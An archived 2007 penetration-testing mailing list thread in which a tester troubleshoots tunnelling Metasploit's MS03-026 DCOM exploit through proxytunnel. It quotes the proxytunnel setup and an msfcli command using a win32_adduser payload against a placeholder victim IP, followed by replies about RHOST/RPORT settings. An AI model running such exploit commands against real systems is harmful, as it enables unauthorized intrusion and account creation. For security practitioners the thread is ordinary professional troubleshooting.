Penetration Testing mailing list archives

Re: Running metasploit thru proxytunnel


From: jond <x () jond com>
Date: Thu, 11 Oct 2007 08:21:55 -0400

I don't know why I didn't think of doing this before. It's so common
sense. I've always hated pivoting because I've always had to manually
find the exploit I needed, compile it, get it back through the
targets, only to find out, it wasn't compiled right. 4 hours later....

So James, does proxytunnel/metasploit work with Alex's suggestion? If
so, I need to get this going in my lab.




On 10/10/07, Alexander Bondarenko <al.bondarenko () gmail com> wrote:
Hi,

Why do you use RHOST=localhost? It should be the proxy IP, and RPORT should be
the proxy port, not 235.


Regards,
Alex


On Saturday 06 October 2007 15:18, James Kelly wrote:
Folks

I've been banging my head into my keyboard for two days now, not
getting anywhere, and I was hoping one of
you could smack me upside the head and tell me what I've screwed up.

Problem:

attacker IP: 1.2.3.4
proxy IP: 2.3.4.5
proxy port 6666
victim: 3.4.5.6
victim port: 7777

Proxytunnel setup:

proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:7777
**now the above config works fine with rdesktop when I use:

proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
and I do
rdesktop localhost:666  <--I can ts to the victim box just fine.

When I try to do metasploit over proxytunnel I do
config:
Metasploit framework2
exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure
Shell" ;-) goes to RPORT 135
payload: win32_adduser

first the tunnel:
proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135
now metasploit
msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost
RPORT=235 PASS=password USER=blah

When I hit the exploit I see "Sending Request..." then nothing.

I can rdesktop via proxytunnel to the victim successfully but cannot
log in with username blah, password password.

Assume the victim is vulnerable to dcom.

Now, can anyone see anything obvious that I've screwed up?




------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
